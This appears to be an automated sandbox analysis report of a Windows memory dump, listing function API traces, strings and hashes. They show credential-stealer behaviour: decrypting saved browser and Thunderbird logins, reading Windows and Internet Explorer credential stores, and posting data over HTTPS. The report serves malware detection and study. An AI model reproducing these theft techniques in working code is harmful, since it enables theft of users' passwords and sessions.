RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436F90
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043716C

Strings

kKC, xrefs: 0043669E
k, xrefs: 004370BD
%s\%s, xrefs: 004363F3, 004367AA, 00436BAA, 00436C35
k`x|, xrefs: 00436930
/$<8, xrefs: 00436DC5
6`_ECWZ, xrefs: 00436552
, xrefs: 0043713B
8, xrefs: 00436309
!eHRQM@Xo@LD, xrefs: 0043682A
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043635C, 004363E8, 00436750, 0043679F, 00436B98
|9, xrefs: 004365B7
3>589}<)g}, xrefs: 00436A15, 00436A49, 00436A9F, 0043666F, 004366A3, 004366F9, 004366AD, 00436A53
?, xrefs: 0043637B
3, xrefs: 0043696E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$3>589}<)g}$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$k$kKC$k`x|$|9
API String ID: 2335028583-1150690332
Opcode ID: e23d1d6b251b4e3d019625948fbe37419d275e077be6f92792eea2f9acd94689
Instruction ID: 91b8013d12c5bab7949268fbb79717665483f54acc398f6523401afbc0a33be3
Opcode Fuzzy Hash: e23d1d6b251b4e3d019625948fbe37419d275e077be6f92792eea2f9acd94689
Instruction Fuzzy Hash: 56A2D170D0425D9EDF25CFA4CC81BEEBBB4AF19304F1081AEE449B7242DB744A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433882, Relevance: 65.3, APIs: 34, Strings: 3, Instructions: 569filestringmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00433887
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00433B2C
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00433BAB
WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00433BBE
CloseHandle.KERNEL32(00000000), ref: 00433BC5
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00433BD9
GetFileSize.KERNEL32(00000000,00000000), ref: 00433BE8
GetProcessHeap.KERNEL32(00000000,00000800), ref: 00433BF9
HeapAlloc.KERNEL32(00000000), ref: 00433C00
lstrlenA.KERNEL32 ref: 00433C17
lstrcpynA.KERNEL32(00000000,00000001), ref: 00433C2C
lstrlenA.KERNEL32(?), ref: 00433C39
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C48
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00433C5F
lstrlenA.KERNEL32(?), ref: 00433C75
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C88
WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00433C99
WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00433CBA
WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00433CC5
WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00433D58

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00433E48
WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00433EB6
WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00433F26
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00433F4E
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00433F64
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00433F99

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpCloseHandle.WINHTTP(00000000), ref: 00434048
WinHttpCloseHandle.WINHTTP(00000000), ref: 00434052
CloseHandle.KERNEL32(?), ref: 0043405B
DeleteFileA.KERNEL32(?), ref: 00434064
WinHttpCloseHandle.WINHTTP(00000000), ref: 0043406B
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00434075
HeapFree.KERNEL32(00000000), ref: 0043407C

Strings

%[^:]://%[^/]%[^], xrefs: 00433CDC
POST, xrefs: 00433E42, 00433EB0
https, xrefs: 00433CEF

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
String ID: %[^:]://%[^/]%[^]$POST$https
API String ID: 2264578430-666396942
Opcode ID: b1ef1917bc0a8318251c53557d51c46c8ae38fa62ce922f68f2b9dcf265a10c7
Instruction ID: 268c877f1b69af4e096e1ece1c9e45decc44a1bdff283dbd08e4261261832945
Opcode Fuzzy Hash: b1ef1917bc0a8318251c53557d51c46c8ae38fa62ce922f68f2b9dcf265a10c7
Instruction Fuzzy Hash: BD32BB70E002589FDB21DFA5CD85AEEBBB4BF09304F0041AEE449A7251EB745E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0042A341
LoadLibraryA.KERNEL32(?), ref: 0042A395
GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A499
GetProcAddress.KERNEL32(00000000,?), ref: 0042A4D5
GetProcAddress.KERNEL32(00000000,?), ref: 0042A50E
lstrlenW.KERNEL32(?), ref: 0042A5D1
lstrcpyW.KERNEL32(00000000,?), ref: 0042A5EC
lstrlenW.KERNEL32(?), ref: 0042A5F9
lstrcpyW.KERNEL32(00000000,?), ref: 0042A618
lstrlenW.KERNEL32(?), ref: 0042A625
lstrcpyW.KERNEL32(00000000,?), ref: 0042A649
lstrlenW.KERNEL32(?), ref: 0042A67D
lstrcpyW.KERNEL32(00000000,?), ref: 0042A69E
StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0042A7B5
lstrlenW.KERNEL32(00000000), ref: 0042A7C0
lstrlenW.KERNEL32(?), ref: 0042A7D0
FreeLibrary.KERNEL32(00000000), ref: 0042A85E

Strings

%, xrefs: 0042A47B
^(?+2*=27p:22, xrefs: 0042A389
vAULTgETiTEM, xrefs: 0042A4C7
Internet Explorer, xrefs: 0042A7AF
RCKU, xrefs: 0042A433

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
API String ID: 4222390991-95504026
Opcode ID: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction ID: ee027e3256dc64104db3165579ce757a5594af22ad4575cabb0489d1c635360c
Opcode Fuzzy Hash: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction Fuzzy Hash: EBF19E71E002689FDF14DFA8DC48BEEBBB8EF49304F10446AE805E7211D7789955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042E110, Relevance: 55.3, APIs: 11, Strings: 19, Instructions: 2823COMMON

Download Yara Rule

Strings

C, xrefs: 00430075
<, xrefs: 00430ED7
/, xrefs: 0042FB5E
V, xrefs: 004301B5
\, xrefs: 0042E886
h, xrefs: 0042EB3F
N, xrefs: 0042FCEE
v, xrefs: 004304EB
:, xrefs: 0042F9CD
s, xrefs: 0042E432
f, xrefs: 0042F829
H, xrefs: 0042EEF7
7, xrefs: 0042F365
Z, xrefs: 00431388
_, xrefs: 004306E4
Q, xrefs: 00430A01
}, xrefs: 0042F1CF
:, xrefs: 0042E112
,, xrefs: 0042ED26

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: swprintf
String ID: ,$/$7$:$:$<$C$H$N$Q$V$Z$\$_$f$h$s$v$}
API String ID: 233258989-3288149934
Opcode ID: caa3264fb8fe92ec417c61be86101a40b86e4a4e981683b2cc915c0df65cfbe9
Instruction ID: 475275c1d7ed544704e005971488929d6d053b4d6a4e5fceb10a333dc0c0ff90
Opcode Fuzzy Hash: caa3264fb8fe92ec417c61be86101a40b86e4a4e981683b2cc915c0df65cfbe9
Instruction Fuzzy Hash: 97439F34D052A99ACF25F765DC52BEDBBB05F25308F0004DEA65973293DA782B88CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004210B1, Relevance: 50.3, APIs: 7, Strings: 21, Instructions: 1335COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004210B6
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004210EB

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 0042124D
NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 004225EB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

sqlite3_finalize.NSS3(?), ref: 004218A4
sqlite3_close.NSS3(?), ref: 004218B1
__fread_nolock.LIBCMT ref: 00421AB2

Part of subcall function 00427160: __EH_prolog.LIBCMT ref: 00427165

Strings

*LEX, xrefs: 00422074
&NIURHGKC, xrefs: 00421E26
ThunderBird, xrefs: 00421B91
F )4, xrefs: 004222F9
Profiles, xrefs: 004210FD
v, xrefs: 004218FD
1', xrefs: 00422279
>6, xrefs: 004221ED
logins, xrefs: 00421B2C, 00421B45
nt{w, xrefs: 00421BAD
W9#, xrefs: 00421809
:,, xrefs: 00422141
c.,9, xrefs: 00421618
<4, xrefs: 00421BF8
2:, xrefs: 004220EB
Gy_H, xrefs: 0042207E
%, xrefs: 00422564
xf, xrefs: 00422094
RD, xrefs: 00421D86
6rkw, xrefs: 004218F6
*-0, xrefs: 00421648

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
String ID: %$&NIURHGKC$*-0$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$ThunderBird$W9#$c.,9$logins$nt{w$v$xf
API String ID: 1928370683-529884781
Opcode ID: 052dfcf81c0c3cda3a4ed1ab996413d9d57754cdae426f4422fb9047ae4db925
Instruction ID: 7cf0c16e80d84c1340ed0f8113b1c6eecb7c157959f31b42812db283f23df99d
Opcode Fuzzy Hash: 052dfcf81c0c3cda3a4ed1ab996413d9d57754cdae426f4422fb9047ae4db925
Instruction Fuzzy Hash: E2D29A70E002A88BCB25DF69D990BEDBBB1AF19304F5041EED409A7252DB785F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004206DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004206E2

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 004208B8

Part of subcall function 00420568: __EH_prolog.LIBCMT ref: 0042056D

LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 00420BB1
GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 00420BFE
GetProcAddress.KERNEL32(00000000,575B5B46), ref: 00420C3E
GetProcAddress.KERNEL32(00000000,?), ref: 00420C7A
GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 00420CBB
GetProcAddress.KERNEL32(00000000,?), ref: 00420CEF
GetProcAddress.KERNEL32(00000000,?), ref: 00420D1D
GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 00420D5C
GetProcAddress.KERNEL32(00000000,?), ref: 00420D8C
GetProcAddress.KERNEL32(00000000,44415C5E), ref: 00420DCA
GetProcAddress.KERNEL32(00000000,?), ref: 00420E08
GetProcAddress.KERNEL32(00000000,?), ref: 00420E38
GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 00420E77

Strings

/,0, xrefs: 00420E52
QJ00F[[W, xrefs: 00420CB2, 00420CB9
yFE^, xrefs: 00420C59
orr~hOHU, xrefs: 00420BF5, 00420BF8
&, xrefs: 00420E59
4du`|, xrefs: 00420AE9
FaOS, xrefs: 00420C52
02/*, xrefs: 00420E44

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
API String ID: 1501777685-1778109498
Opcode ID: 580bc57cc4504c9b8ab0692da6f7643fd557fd809a01c5f3242512048c003d39
Instruction ID: 3ceee775c1db2101e3abe91b8041793fdedad25dba46125a77d36f99286f4ace
Opcode Fuzzy Hash: 580bc57cc4504c9b8ab0692da6f7643fd557fd809a01c5f3242512048c003d39
Instruction Fuzzy Hash: 1132F330E01298CFDB01DBA9D9947EEBBF4AF19304FA4086ED441A7253DB784A85CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E139, Relevance: 30.9, APIs: 13, Strings: 4, Instructions: 1136libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E13E
GetProcAddress.KERNEL32(?,?), ref: 0040E198
GetProcAddress.KERNEL32(?,?), ref: 0040E1DC
GetProcAddress.KERNEL32(?,?), ref: 0040E22A
GetProcAddress.KERNEL32(?,?), ref: 0040E277
GetProcAddress.KERNEL32(?,?), ref: 0040E2C1
GetProcAddress.KERNEL32(?,?), ref: 0040E30B
GetProcAddress.KERNEL32(?,?), ref: 0040E34E
GetProcAddress.KERNEL32(?,?), ref: 0040E390
wsprintfA.USER32 ref: 0040E409

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0043584C: __EH_prolog.LIBCMT ref: 00435851

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED19
LocalFree.KERNEL32(?,?,?), ref: 0040ED84

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Strings

S, xrefs: 0040F034
Opera, xrefs: 0040E92D
UCBrowser, xrefs: 0040E500
360Browser, xrefs: 0040E517

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$Deallocate$CryptDataFreeLocalUnprotect_free_strcatwsprintf
String ID: 360Browser$Opera$S$UCBrowser
API String ID: 1533498561-2102145511
Opcode ID: 048c9f4840675e753e9955619f8da9b8efb1bba5d9440a3ec78581ebd031c2d2
Instruction ID: b48f6e05fcb707e89987015dea396383d640a2a9a36e0cc3998b43e1c57b30ee
Opcode Fuzzy Hash: 048c9f4840675e753e9955619f8da9b8efb1bba5d9440a3ec78581ebd031c2d2
Instruction Fuzzy Hash: ECB2BA30D00268CBDB21DB65CD94BEEBBB4AF59304F1045EAE409B7292DB745E88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E6, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 861libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F2EB
GetProcAddress.KERNEL32(?,?), ref: 0040F339
GetProcAddress.KERNEL32(?,?), ref: 0040F36B
GetProcAddress.KERNEL32(?,?), ref: 0040F3AA
GetProcAddress.KERNEL32(?,?), ref: 0040F3E2
GetProcAddress.KERNEL32(?,?), ref: 0040F417
GetProcAddress.KERNEL32(?,?), ref: 0040F44C
GetProcAddress.KERNEL32(?,?), ref: 0040F47D
GetProcAddress.KERNEL32(?,?), ref: 0040F4BF
wsprintfA.USER32 ref: 0040F539

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FBE6
LocalFree.KERNEL32(?,?,?), ref: 0040FC4B
LocalFree.KERNEL32(?), ref: 0040FD1D

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0040B938: __EH_prolog.LIBCMT ref: 0040B93D
Part of subcall function 0040B938: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040B9A6
Part of subcall function 0040B938: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040B9C4
Part of subcall function 0040B938: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040B9E5
Part of subcall function 0040B938: LocalAlloc.KERNEL32(00000040,?), ref: 0040BA36
Part of subcall function 0040B938: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040BA5E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FCD3

Strings

Opera, xrefs: 0040F88F
UCBrowser, xrefs: 0040F668
360Browser, xrefs: 0040F67D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Crypt$Local$DataDeallocateFreeH_prologUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetricwsprintf
String ID: 360Browser$Opera$UCBrowser
API String ID: 120052701-2459207352
Opcode ID: 5dfc08306cf59e21c1f827f8edb3d58fe3b671ee33aa35ef9a8c9e49948d52a9
Instruction ID: a9e54f43a0eb16203e17623fa23cba974b08bfcab0be327bc3a9de8742627967
Opcode Fuzzy Hash: 5dfc08306cf59e21c1f827f8edb3d58fe3b671ee33aa35ef9a8c9e49948d52a9
Instruction Fuzzy Hash: 7572AE30D04258DBDF21DFA4CD91AEEBBB5BF19308F1040AEE409B7292DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00429F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00429F82
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00429FA3
lstrlenW.KERNEL32(?,?,00000000), ref: 00429FB2
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00429FC5
CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00429FE8
wsprintfW.USER32 ref: 0042A024
lstrcatW.KERNEL32(00000000,?), ref: 0042A032
wsprintfW.USER32 ref: 0042A052
lstrcatW.KERNEL32(00000000,?), ref: 0042A060
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042A069
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 0042A074
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042A0BB
CryptUnprotectData.CRYPT32(?,00000000,0042A2AF,00000000,00000000,00000001,?), ref: 0042A0DE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042A117

Strings

%02X, xrefs: 0042A01E, 0042A04C
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0042A08E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction ID: 005e14ebd307acc44d900abe414c883e19f5054360f72cf190598c62f8d9df29
Opcode Fuzzy Hash: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction Fuzzy Hash: 82514171E00219AFDB119FA4EC45FFF77BCAF44304F14402AE905E2151EAB89A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D684, Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 737libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D689
GetProcAddress.KERNEL32(?,?), ref: 0040D6D4
GetProcAddress.KERNEL32(?,?), ref: 0040D706
GetProcAddress.KERNEL32(?,?), ref: 0040D745
GetProcAddress.KERNEL32(?,?), ref: 0040D77D
GetProcAddress.KERNEL32(?,?), ref: 0040D7B2
GetProcAddress.KERNEL32(?,?), ref: 0040D7E3
GetProcAddress.KERNEL32(?,?), ref: 0040D825
wsprintfA.USER32 ref: 0040D89F

Strings

Opera, xrefs: 0040DB96

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID: Opera
API String ID: 3606448584-505338728
Opcode ID: c8e69c071c2959531d8b1d48fd7e2d0eb9ac6bb67423dff394ea4ed1641be3c1
Instruction ID: 6e7de8c24cde57863cb19fb5fa9ebaa263f0b344b032abc7ce2d8d9550343516
Opcode Fuzzy Hash: c8e69c071c2959531d8b1d48fd7e2d0eb9ac6bb67423dff394ea4ed1641be3c1
Instruction Fuzzy Hash: 0962B130D00259CBDF11EFA5CD91AEDBBB4AF19304F1084AEE409B7291DB745A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E2E4, Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

UT, xrefs: 0043E5BF
in-gdi-devcaps-l1-1-0, xrefs: 0043E30E
/, xrefs: 0043E37B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /$UT$in-gdi-devcaps-l1-1-0
API String ID: 0-3985708853
Opcode ID: 24c08fa2b66218b3b9b6ad1fa51d25a0a079473a53f11dcd4cd7e8150b3a3b0e
Instruction ID: 76826b07e805f1e516683311a4db4d08ba6e9d74c9be735415875e9b36247458
Opcode Fuzzy Hash: 24c08fa2b66218b3b9b6ad1fa51d25a0a079473a53f11dcd4cd7e8150b3a3b0e
Instruction Fuzzy Hash: 8E02B071A093819FD714DF2AD4807ABB7E4BF99304F14182EF98583391D738D859CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0042A156
lstrlenW.KERNEL32(00000002), ref: 0042A167
CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
LocalFree.KERNEL32(?), ref: 0042A200
CredFree.ADVAPI32(?), ref: 0042A219

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0042A144
Microsoft_WinInet_*, xrefs: 0042A18B
J, xrefs: 0042A170

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction ID: 19e365c0e672387ba2505b807b813ee5e5cbdbe09d4aa82ca4ca5ffd792269d9
Opcode Fuzzy Hash: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction Fuzzy Hash: 7A315771E00218EBCB20DF95E844DEFBBB8FB84700F50416AE812E3241E7759A11DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF54, Relevance: 15.5, APIs: 10, Instructions: 504libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CF59
GetProcAddress.KERNEL32(?,?), ref: 0040CFA4
GetProcAddress.KERNEL32(?,?), ref: 0040CFD6
GetProcAddress.KERNEL32(?,?), ref: 0040D015
GetProcAddress.KERNEL32(?,?), ref: 0040D04D
GetProcAddress.KERNEL32(?,?), ref: 0040D082
GetProcAddress.KERNEL32(?,?), ref: 0040D0B3
GetProcAddress.KERNEL32(?,918C8E02), ref: 0040D0F5
wsprintfA.USER32 ref: 0040D159

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID:
API String ID: 3606448584-0
Opcode ID: c9db41b7835abe3aebd6bdc91c4cacfa397cd42538136d7ce5f024def887e238
Instruction ID: 951dca3d5f1a07d3a896ba0750219855a8922a9ceac53cead332dd2a48e4a733
Opcode Fuzzy Hash: c9db41b7835abe3aebd6bdc91c4cacfa397cd42538136d7ce5f024def887e238
Instruction Fuzzy Hash: 57220330D04248CFDF01DFE8D9906EEBBB5AF59308F1094AEE445B7252DB744A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD36, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

_strcat.LIBCMT ref: 0041FEA9
_strcat.LIBCMT ref: 0041FF24
SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 00420079
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00420099

Strings

/..\, xrefs: 0041FF0B
\../, xrefs: 0041FEE9
\..\, xrefs: 0041FED3
/../, xrefs: 0041FEFA

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileTime$_strcat$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 3418985325-3885502717
Opcode ID: e36f6525fcdad91412cec21d8097de7434c186f32a9bb4fca3382da102c0e645
Instruction ID: b00080852119e3309c6e69affa03d4f88f3d8ac799483f1e808ff3a2e1d6d61c
Opcode Fuzzy Hash: e36f6525fcdad91412cec21d8097de7434c186f32a9bb4fca3382da102c0e645
Instruction Fuzzy Hash: 01E1E2715087418BD315CF29C4806E7BBE0AF89314F548A2FE4A9C7342D779D98ACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004373C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004373CB
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

Y+6, xrefs: 0043747B
wEGGOW%E, xrefs: 0043773C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID: Y+6$wEGGOW%E
API String ID: 2130659939-258343349
Opcode ID: 5bbf7c337dd0148f23d41c850287ec4324f0d4ca693d9f661333568adc2941bf
Instruction ID: 479214f8d44ea07ff9a1ad6becd9a1226b0edc878cb2a4cc9ae60e24f50ce448
Opcode Fuzzy Hash: 5bbf7c337dd0148f23d41c850287ec4324f0d4ca693d9f661333568adc2941bf
